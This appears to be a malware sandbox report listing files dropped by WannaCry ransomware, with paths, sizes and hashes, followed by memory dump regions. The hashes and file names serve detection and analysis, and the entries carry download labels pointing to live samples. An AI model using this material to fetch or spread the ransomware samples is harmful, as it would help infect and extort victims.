fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry
Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry
Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry
Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry
Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry
Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry
Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry
Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\AppData\Local\Temp\r.wnry
Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.wnry
Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\AppData\Local\Temp\t.wnry
Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe
Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\u.wnry
Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
3KB

MD5
ca5983a592d5047e58efffb6d0bc4263

SHA1
c82da2fe80f95d209c12ce25fa69ef140977f2e0

SHA256
f63eeb55c97ba9aaac82fe060ce90cecdca500da2376a3388af3e7b53582b367

SHA512
4e41896cf3970e6981f3a0349affff3bc8d7b98218ff8ac5c53a469677bd8cb5ba0a344b637e1e574556bde0a3f17282e0fc7b0a76c5362f917fa7989c5329ef

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
Filesize
8.7MB

MD5
c318c7bf602547c460a142931a10d586

SHA1
f3f5e19b0b7b6d5f091c9e3b2019a6cbfd3c15df

SHA256
a54dab6c73945336c758f4cd8bbcd7443c60be4870033662dc3307bcd9b06ae5

SHA512
278f99a92e8784c9186ead59d393f6d138467ddda153c31f337e12e775ea61ba791f9a4785fbfe5611aa52580bffbb973aaadfd60010af98372df3e51354a7c5

Download Submit
C:\Users\Default\Desktop\@WanaDecryptor@.bmp
Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\note.txt
Filesize
218B

MD5
afa6955439b8d516721231029fb9ca1b

SHA1
087a043cc123c0c0df2ffadcf8e71e3ac86bbae9

SHA256
8e9f20f6864c66576536c0b866c6ffdcf11397db67fe120e972e244c3c022270

SHA512
5da21a31fbc4e8250dffed30f66b896bdf007ac91948140334fe36a3f010e1bac3e70a07e9f3eb9da8633189091fd5cadcabbaacd3e01da0fe7ae28a11b3dddf

Download Submit
memory/1572-187-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/4736-1848-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1785-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1615-0x0000000072E30000-0x0000000072E52000-memory.dmp

Filesize
136KB

Download
memory/4736-1614-0x0000000072E60000-0x0000000072EE2000-memory.dmp

Filesize
520KB

Download
memory/4736-1613-0x00000000735D0000-0x00000000735EC000-memory.dmp

Filesize
112KB

Download
memory/4736-1612-0x0000000072EF0000-0x0000000072F72000-memory.dmp

Filesize
520KB

Download
memory/4736-1611-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1617-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1582-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1581-0x0000000072E30000-0x0000000072E52000-memory.dmp

Filesize
136KB

Download
memory/4736-1580-0x0000000072E60000-0x0000000072EE2000-memory.dmp

Filesize
520KB

Download
memory/4736-1579-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1578-0x0000000072EF0000-0x0000000072F72000-memory.dmp

Filesize
520KB

Download
memory/4736-1627-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1633-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1616-0x0000000072DB0000-0x0000000072E27000-memory.dmp

Filesize
476KB

Download
memory/4736-1791-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1842-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1936-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1880-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1886-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1906-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/4736-1912-0x0000000072B90000-0x0000000072DAC000-memory.dmp

Filesize
2.1MB

Download
memory/4736-1930-0x0000000000870000-0x0000000000B6E000-memory.dmp

Filesize
3.0MB

Download
memory/5392-1949-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/5392-1947-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/5392-1956-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/5392-1954-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/5392-1955-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/5392-1950-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download